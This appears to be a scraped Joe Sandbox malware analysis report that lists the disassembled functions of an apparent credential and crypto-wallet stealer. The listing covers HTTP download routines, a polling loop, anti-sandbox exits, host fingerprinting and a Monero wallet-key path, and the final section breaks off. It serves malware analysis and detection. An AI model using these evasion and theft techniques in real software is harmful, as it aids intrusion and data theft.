                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: HttpQueryInfoA$InternetSetOptionA
                      • API String ID: 2238633743-1775429166
                      • Opcode ID: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
                      • Instruction ID: 8c2bd1f46042af4331dff5695dd1bf9af67209197da10ad2c688805e08b5f95d
                      • Opcode Fuzzy Hash: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
                      • Instruction Fuzzy Hash: 4F623DB5680200BFF745DFA8ED889563BF9F79C701734C51BA609C3224D63DA452EB2A
                      Function 00546280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1033 546280-54630b call 55a7a0 call 5447b0 call 55a740 InternetOpenA StrCmpCA 1040 546314-546318 1033->1040 1041 54630d 1033->1041 1042 54631e-546342 InternetConnectA 1040->1042 1043 546509-546525 call 55a7a0 call 55a800 * 2 1040->1043 1041->1040 1045 5464ff-546503 InternetCloseHandle 1042->1045 1046 546348-54634c 1042->1046 1062 546528-54652d 1043->1062 1045->1043 1047 54634e-546358 1046->1047 1048 54635a 1046->1048 1050 546364-546392 HttpOpenRequestA 1047->1050 1048->1050 1052 5464f5-5464f9 InternetCloseHandle 1050->1052 1053 546398-54639c 1050->1053 1052->1045 1055 5463c5-546405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 54639e-5463bf InternetSetOptionA 1053->1056 1058 546407-546427 call 55a740 call 55a800 * 2 1055->1058 1059 54642c-54644b call 558940 1055->1059 1056->1055 1058->1062 1066 54644d-546454 1059->1066 1067 5464c9-5464e9 call 55a740 call 55a800 * 2 1059->1067 1069 546456-546480 InternetReadFile 1066->1069 1070 5464c7-5464ef InternetCloseHandle 1066->1070 1067->1062 1073 546482-546489 1069->1073 1074 54648b 1069->1074 1070->1052 1073->1074 1078 54648d-5464c5 call 55a9b0 call 55a8a0 call 55a800 1073->1078 1074->1070 1078->1069
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                        • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                      • StrCmpCA.SHLWAPI(?,0102FC80), ref: 00546303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                      • HttpOpenRequestA.WININET(00000000,GET,?,0102F320,00000000,00000000,00400100,00000000), ref: 00546385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005463FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0054646D
                      • InternetCloseHandle.WININET(00000000), ref: 005464EF
                      • InternetCloseHandle.WININET(00000000), ref: 005464F9
                      • InternetCloseHandle.WININET(00000000), ref: 00546503
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ERROR$ERROR$GET
                      • API String ID: 3749127164-2509457195
                      • Opcode ID: ab40f46a5d2469f8a56c078fce8667cc4f8a2533513d04537aace29373dedb36
                      • Instruction ID: 7f514b6d827b27c4ef4e35ce086dbf0955f25cf08fa387ffc761687a3b59f8c0
                      • Opcode Fuzzy Hash: ab40f46a5d2469f8a56c078fce8667cc4f8a2533513d04537aace29373dedb36
                      • Instruction Fuzzy Hash: 69717E71A40218ABEF24DFA0CC99BEE7B74FB44705F108199F5096B190DBB46A89CF52
                      Function 00555510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1090 555510-555577 call 555ad0 call 55a820 * 3 call 55a740 * 4 1106 55557c-555583 1090->1106 1107 555585-5555b6 call 55a820 call 55a7a0 call 541590 call 5551f0 1106->1107 1108 5555d7-55564c call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1106->1108 1123 5555bb-5555d2 call 55a8a0 call 55a800 1107->1123 1134 555693-5556a9 call 55aad0 StrCmpCA 1108->1134 1138 55564e-55568e call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1108->1138 1123->1134 1139 5557dc-555844 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1134->1139 1140 5556af-5556b6 1134->1140 1138->1134 1269 555ac3-555ac6 1139->1269 1142 5556bc-5556c3 1140->1142 1143 5557da-55585f call 55aad0 StrCmpCA 1140->1143 1146 5556c5-555719 call 55a820 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1142->1146 1147 55571e-555793 call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1142->1147 1162 555865-55586c 1143->1162 1163 555991-5559f9 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1143->1163 1146->1143 1147->1143 1246 555795-5557d5 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1147->1246 1168 555872-555879 1162->1168 1169 55598f-555a14 call 55aad0 StrCmpCA 1162->1169 1163->1269 1175 5558d3-555948 call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1168->1175 1176 55587b-5558ce call 55a820 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1168->1176 1198 555a16-555a21 Sleep 1169->1198 1199 555a28-555a91 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1169->1199 1175->1169 1274 55594a-55598a call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1175->1274 1176->1169 1198->1106 1199->1269 1246->1143 1274->1169
                      APIs
                        • Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
                        • Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005556A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555857
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 005552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
                        • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 0055532F
                        • Part of subcall function 005552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
                        • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 00555383
                        • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 005553AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0055578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555A0C
                      • Sleep.KERNEL32(0000EA60), ref: 00555A1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 507064821-2791005934
                      • Opcode ID: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
                      • Instruction ID: 5a177d458226dcc38ccf78542989660d096b988be3e639be12728353077dd10b
                      • Opcode Fuzzy Hash: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
                      • Instruction Fuzzy Hash: 2DE16471910505AADB04FBB0DC7ADED7B38BF94301F50822AB90756491FF346A4DCBA6
                      Function 005517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1301 5517a0-5517cd call 55aad0 StrCmpCA 1304 5517d7-5517f1 call 55aad0 1301->1304 1305 5517cf-5517d1 ExitProcess 1301->1305 1309 5517f4-5517f8 1304->1309 1310 5519c2-5519cd call 55a800 1309->1310 1311 5517fe-551811 1309->1311 1312 551817-55181a 1311->1312 1313 55199e-5519bd 1311->1313 1315 551835-551844 call 55a820 1312->1315 1316 5518f1-551902 StrCmpCA 1312->1316 1317 551951-551962 StrCmpCA 1312->1317 1318 551970-551981 StrCmpCA 1312->1318 1319 551913-551924 StrCmpCA 1312->1319 1320 551932-551943 StrCmpCA 1312->1320 1321 55185d-55186e StrCmpCA 1312->1321 1322 55187f-551890 StrCmpCA 1312->1322 1323 551821-551830 call 55a820 1312->1323 1324 5518ad-5518be StrCmpCA 1312->1324 1325 5518cf-5518e0 StrCmpCA 1312->1325 1326 55198f-551999 call 55a820 1312->1326 1327 551849-551858 call 55a820 1312->1327 1313->1309 1315->1313 1346 551904-551907 1316->1346 1347 55190e 1316->1347 1329 551964-551967 1317->1329 1330 55196e 1317->1330 1332 551983-551986 1318->1332 1333 55198d 1318->1333 1348 551926-551929 1319->1348 1349 551930 1319->1349 1350 551945-551948 1320->1350 1351 55194f 1320->1351 1338 551870-551873 1321->1338 1339 55187a 1321->1339 1340 551892-55189c 1322->1340 1341 55189e-5518a1 1322->1341 1323->1313 1342 5518c0-5518c3 1324->1342 1343 5518ca 1324->1343 1344 5518e2-5518e5 1325->1344 1345 5518ec 1325->1345 1326->1313 1327->1313 1329->1330 1330->1313 1332->1333 1333->1313 1338->1339 1339->1313 1355 5518a8 1340->1355 1341->1355 1342->1343 1343->1313 1344->1345 1345->1313 1346->1347 1347->1313 1348->1349 1349->1313 1350->1351 1351->1313 1355->1313
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 005517C5
                      • ExitProcess.KERNEL32 ref: 005517D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 63e27d10e2f6ea0595d396624f19bbfacaaea02ba4560fa261432533537dc8bc
                      • Instruction ID: 9718d430643462fc169efdcf7e45ef393aae361b98d3e65a5e26ff3b68ad1b62
                      • Opcode Fuzzy Hash: 63e27d10e2f6ea0595d396624f19bbfacaaea02ba4560fa261432533537dc8bc
                      • Instruction Fuzzy Hash: A75180B4A00209EFDB04DFA0D964BBE7FB5BF44705F10854EE906A7280D774E949CB66
                      Function 00557500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1356 557500-55754a GetWindowsDirectoryA 1357 557553-5575c7 GetVolumeInformationA call 558d00 * 3 1356->1357 1358 55754c 1356->1358 1365 5575d8-5575df 1357->1365 1358->1357 1366 5575e1-5575fa call 558d00 1365->1366 1367 5575fc-557617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 557619-557626 call 55a740 1367->1369 1370 557628-557658 wsprintfA call 55a740 1367->1370 1377 55767e-55768e 1369->1377 1370->1377
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00557542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0055757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0055760A
                      • wsprintfA.USER32 ref: 00557640
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\$V
                      • API String ID: 1544550907-271220574
                      • Opcode ID: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
                      • Instruction ID: 871dd97918fa2740fbfea29058f5f3ac6086560c7843153b6e4e508ef4be1c59
                      • Opcode Fuzzy Hash: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
                      • Instruction Fuzzy Hash: CA4194B1D04248ABDF10DF94DC59BEEBBB8FF48701F10419AF90567280E7786A48CBA5
                      Function 005569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021680), ref: 005598A1
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021710), ref: 005598BA
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021698), ref: 005598D2
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021770), ref: 005598EA
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021788), ref: 00559903
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01028928), ref: 0055991B
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,010154E8), ref: 00559933
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01015448), ref: 0055994C
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,010217A0), ref: 00559964
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021518), ref: 0055997C
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,010216B0), ref: 00559995
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021530), ref: 005599AD
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,010156C8), ref: 005599C5
                        • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01021548), ref: 005599DE
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 005411D0: ExitProcess.KERNEL32 ref: 00541211
                        • Part of subcall function 00541160: GetSystemInfo.KERNEL32(?), ref: 0054116A
                        • Part of subcall function 00541160: ExitProcess.KERNEL32 ref: 0054117E
                        • Part of subcall function 00541110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
                        • Part of subcall function 00541110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
                        • Part of subcall function 00541110: ExitProcess.KERNEL32 ref: 00541143
                        • Part of subcall function 00541220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
                        • Part of subcall function 00541220: ExitProcess.KERNEL32 ref: 00541294
                        • Part of subcall function 00556770: GetUserDefaultLangID.KERNEL32 ref: 00556774
                        • Part of subcall function 00541190: ExitProcess.KERNEL32 ref: 005411C6
                        • Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                        • Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                        • Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                        • Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                        • Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                        • Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010289A8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00556AF9
                      • Sleep.KERNEL32(00001770), ref: 00556B04
                      • CloseHandle.KERNEL32(?,00000000,?,010289A8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
                      • ExitProcess.KERNEL32 ref: 00556B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2931873225-0
                      • Opcode ID: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
                      • Instruction ID: 6497a6133172337643a503fd40492882b901ac90d3a50e916afcc4b435b2b13e
                      • Opcode Fuzzy Hash: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
                      • Instruction Fuzzy Hash: EE31527094010AAADB04F7F0DC6EBEE7F78BF84342F50461AF902A2181EF746509C7A6
                      Function 00556AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1436 556af3 1437 556b0a 1436->1437 1439 556b0c-556b22 call 556920 call 555b10 CloseHandle ExitProcess 1437->1439 1440 556aba-556ad7 call 55aad0 OpenEventA 1437->1440 1446 556af5-556b04 CloseHandle Sleep 1440->1446 1447 556ad9-556af1 call 55aad0 CreateEventA 1440->1447 1446->1437 1447->1439
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010289A8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00556AF9
                      • Sleep.KERNEL32(00001770), ref: 00556B04
                      • CloseHandle.KERNEL32(?,00000000,?,010289A8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
                      • ExitProcess.KERNEL32 ref: 00556B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
